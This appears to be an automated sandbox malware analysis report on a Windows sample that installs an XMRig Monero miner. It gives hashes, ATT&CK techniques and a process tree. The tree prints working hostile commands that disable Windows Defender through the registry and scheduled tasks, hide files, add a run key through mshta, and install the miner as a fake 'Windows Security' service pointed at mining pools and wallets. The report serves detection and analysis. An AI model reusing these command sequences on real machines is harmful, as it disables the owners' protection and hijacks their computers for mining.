xmrig | 82d4c31b741a633f3eaaf8f6c361b99e5de14060d26457ac1be57bb0f8a1d3bf

Analysis

max time kernel
41s
max time network
120s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
13-05-2023 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Size

4.1MB
MD5

f962628bdeea7557ae61ea61b3e8bd51
SHA1

ebec33d67bd123146341e02690637f8a40234f27
SHA256

202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f
SHA512

51c552e057010c759ead1f4ead26477d14a2190f3f3c620e16dad9d06c37d3f82cc8508ac0e6f0febb1715e241ebabf2ffaa9170540ef376d7b878f0368abcb7
SSDEEP

98304:nktEDt0k984nukQYxQFKWRw3hmXsFALcQUkfL3BIdw48phwTpb+:np0k98caxFLRyhulUkD3BIP8b6b+

Score

10^/10

xmrig evasion miner persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000600000001434a-153.dat	family_xmrig
behavioral1/files/0x000600000001434a-153.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1756	attrib.exe
1160	attrib.exe
908	attrib.exe
1092	attrib.exe

Executes dropped EXE 6 IoCs

pid	Process
1004	7za.exe
1252	update.exe
780	NSudo.exe
1208	Process not Found
1976	nssm.exe
1880	nssm.exe

Loads dropped DLL 2 IoCs

pid	Process
840	cmd.exe
1252	update.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")"	WScript.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000014691-129.dat	autoit_exe
behavioral1/files/0x0006000000014691-131.dat	autoit_exe
behavioral1/files/0x0006000000014691-135.dat	autoit_exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_debug.log	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs

pid	Process
1004	7za.exe
1976	nssm.exe
1880	nssm.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
780	NSudo.exe
780	NSudo.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeRestorePrivilege	1004	7za.exe
Token: 35	1004	7za.exe
Token: SeSecurityPrivilege	1004	7za.exe
Token: SeSecurityPrivilege	1004	7za.exe
Token: 18446744065119617044	780	NSudo.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe
Token: SeShutdownPrivilege	1964	chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1252	update.exe
1252	update.exe
1252	update.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1252	update.exe
1252	update.exe
1252	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 924 wrote to memory of 840	924	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	28
PID 924 wrote to memory of 840	924	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	28
PID 924 wrote to memory of 840	924	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	28
PID 924 wrote to memory of 840	924	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	28
PID 840 wrote to memory of 1252	840	cmd.exe	30
PID 840 wrote to memory of 1252	840	cmd.exe	30
PID 840 wrote to memory of 1252	840	cmd.exe	30
PID 840 wrote to memory of 1276	840	cmd.exe	31
PID 840 wrote to memory of 1276	840	cmd.exe	31
PID 840 wrote to memory of 1276	840	cmd.exe	31
PID 840 wrote to memory of 552	840	cmd.exe	32
PID 840 wrote to memory of 552	840	cmd.exe	32
PID 840 wrote to memory of 552	840	cmd.exe	32
PID 840 wrote to memory of 1148	840	cmd.exe	33
PID 840 wrote to memory of 1148	840	cmd.exe	33
PID 840 wrote to memory of 1148	840	cmd.exe	33
PID 840 wrote to memory of 1400	840	cmd.exe	34
PID 840 wrote to memory of 1400	840	cmd.exe	34
PID 840 wrote to memory of 1400	840	cmd.exe	34
PID 840 wrote to memory of 332	840	cmd.exe	35
PID 840 wrote to memory of 332	840	cmd.exe	35
PID 840 wrote to memory of 332	840	cmd.exe	35
PID 840 wrote to memory of 524	840	cmd.exe	36
PID 840 wrote to memory of 524	840	cmd.exe	36
PID 840 wrote to memory of 524	840	cmd.exe	36
PID 840 wrote to memory of 548	840	cmd.exe	37
PID 840 wrote to memory of 548	840	cmd.exe	37
PID 840 wrote to memory of 548	840	cmd.exe	37
PID 840 wrote to memory of 568	840	cmd.exe	38
PID 840 wrote to memory of 568	840	cmd.exe	38
PID 840 wrote to memory of 568	840	cmd.exe	38
PID 840 wrote to memory of 700	840	cmd.exe	39
PID 840 wrote to memory of 700	840	cmd.exe	39
PID 840 wrote to memory of 700	840	cmd.exe	39
PID 840 wrote to memory of 876	840	cmd.exe	40
PID 840 wrote to memory of 876	840	cmd.exe	40
PID 840 wrote to memory of 876	840	cmd.exe	40
PID 840 wrote to memory of 640	840	cmd.exe	41
PID 840 wrote to memory of 640	840	cmd.exe	41
PID 840 wrote to memory of 640	840	cmd.exe	41
PID 840 wrote to memory of 596	840	cmd.exe	42
PID 840 wrote to memory of 596	840	cmd.exe	42
PID 840 wrote to memory of 596	840	cmd.exe	42
PID 840 wrote to memory of 1260	840	cmd.exe	43
PID 840 wrote to memory of 1260	840	cmd.exe	43
PID 840 wrote to memory of 1260	840	cmd.exe	43
PID 840 wrote to memory of 1928	840	cmd.exe	44
PID 840 wrote to memory of 1928	840	cmd.exe	44
PID 840 wrote to memory of 1928	840	cmd.exe	44
PID 840 wrote to memory of 1868	840	cmd.exe	45
PID 840 wrote to memory of 1868	840	cmd.exe	45
PID 840 wrote to memory of 1868	840	cmd.exe	45
PID 840 wrote to memory of 908	840	cmd.exe	46
PID 840 wrote to memory of 908	840	cmd.exe	46
PID 840 wrote to memory of 908	840	cmd.exe	46
PID 840 wrote to memory of 1364	840	cmd.exe	47
PID 840 wrote to memory of 1364	840	cmd.exe	47
PID 840 wrote to memory of 1364	840	cmd.exe	47
PID 840 wrote to memory of 572	840	cmd.exe	48
PID 840 wrote to memory of 572	840	cmd.exe	48
PID 840 wrote to memory of 572	840	cmd.exe	48
PID 840 wrote to memory of 1488	840	cmd.exe	49
PID 840 wrote to memory of 1488	840	cmd.exe	49
PID 840 wrote to memory of 1488	840	cmd.exe	49

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1160	attrib.exe
908	attrib.exe
1092	attrib.exe
1756	attrib.exe

C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:924
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1121.tmp\1132.tmp\1133.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:840
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:1276
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:552
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:1148
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1400
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:332
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:524
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:548
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:568
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:700
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:876
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:640
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    3⤵
    PID:596
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1260
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1928
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1868
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:908
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:1364
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:572
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:1488
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    3⤵
    PID:612
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    3⤵
    PID:1576
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    3⤵
    PID:996
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1688
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1008
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:884
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1684
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:928
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1356
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:1348
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:544
- - C:\Perform\7za.exe
    7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Perform\update.exe
    C:\Perform\update.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1252
  - - C:\Perform\Resources\NSudo.exe
      C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:780
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
    3⤵
    - Adds Run key to start application
    PID:1636
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
      4⤵
      Modifies Internet Explorer settings
      PID:996
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
        5⤵
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6829758,0x7fef6829768,0x7fef6829778
        6⤵
        
        PID:2016
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=840 --field-trial-handle=1000,i,13444263073899666861,12835274267274120606,131072 --disable-features=PaintHolding /prefetch:2
        6⤵
        
        PID:1524
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=1228 --field-trial-handle=1000,i,13444263073899666861,12835274267274120606,131072 --disable-features=PaintHolding /prefetch:8
        6⤵
        
        PID:1740
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1488 --field-trial-handle=1000,i,13444263073899666861,12835274267274120606,131072 --disable-features=PaintHolding /prefetch:1
        6⤵
        
        PID:1004
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1160
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\Defender.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:908
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\nssm.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1092
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\7za.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1756
- - C:\Perform\nssm.exe
    nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1976
- - C:\Perform\nssm.exe
    nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1880

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Perform\7za.exe

Filesize
674KB

MD5
0184e6ebe133ef41a8cc6ef98a263712

SHA1
cb9f603e061aef833a2db501aa8ba6ba007d768e

SHA256
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229

SHA512
6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

Download Submit
C:\Perform\Defender.exe

Filesize
7.0MB

MD5
33dcb753b2236649ae2f13d898e8eb5d

SHA1
f9be1a9b50b55d9244e20c8ea79ad276854f461c

SHA256
f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160

SHA512
7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731

Download Submit
C:\Perform\Resources\NSudo.exe

Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\up.vbs

Filesize
745B

MD5
9fc9cd6fff29c03e2b164cafe21543a1

SHA1
c348cd40f9e112413a2587ef3036628a056aee13

SHA256
b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1

SHA512
1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b

Download Submit
C:\Perform\update.exe

Filesize
1.1MB

MD5
0e4afc55e03f8fe26d82e054004c16a3

SHA1
e5560a6d10d11e84eb094561ae1ec1c4461dd2c7

SHA256
d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e

